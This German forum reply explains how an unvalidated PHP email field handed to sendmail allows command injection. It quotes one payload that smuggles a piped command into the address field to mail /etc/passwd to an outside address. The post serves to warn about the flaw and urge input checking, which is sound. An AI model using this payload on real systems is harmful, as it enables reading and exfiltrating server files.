Halihallo Philip

Äm, bitte Antworte auf das Posting, worauf du antworten möchtest, oder schreibe
wenigstens einen Namen hin und quote das, was schon gesagt wurde.

von diesen Pipes wie du sie nennst hab ich auch schon gehört. Alber was geanau bringen sie? Weshalb sind sie "gefährlich"?

Lies die von mir verlinkte Ressource, dort steht u. a.:

nospam@fasel.com| mail bla@fasel.com < /etc/passwd

also, wenn dies über $_POST['email'] eingelesen wird und an sendmail übergeben wird,
wird sendmail gestartet, eine Pipe zu 'mail ...' geöffnet und dieser Befehl wird
ausgeführt, sprich: Maile die Datei /etc/passwd an bla@fasel.com und nun kennt der
Angreifer interne Daten des Systems (obgleich die in passwd gecrypted sind, aber
schliesslich liesse sich so jede andere Datei aus dem System lesen).
Ohne Überprüfung der Mailadresse hat der Angreifer Zugriff auf einige Dateien (er
hat meistens kein root-Zugriff und deshalb auch nicht Zugriff auf alles, dennoch
kann man damit schon ziemlich unfug anstellen). Ach ja, | mail..., da kannst du auch
jeden anderen Befehl einschleusen!

Gibt es die Möglichkeit eine von mir definierte PHP Funktion von einem externen Server zu starten?

Nur, wenn du es willst.

Viele Grüsse

Philipp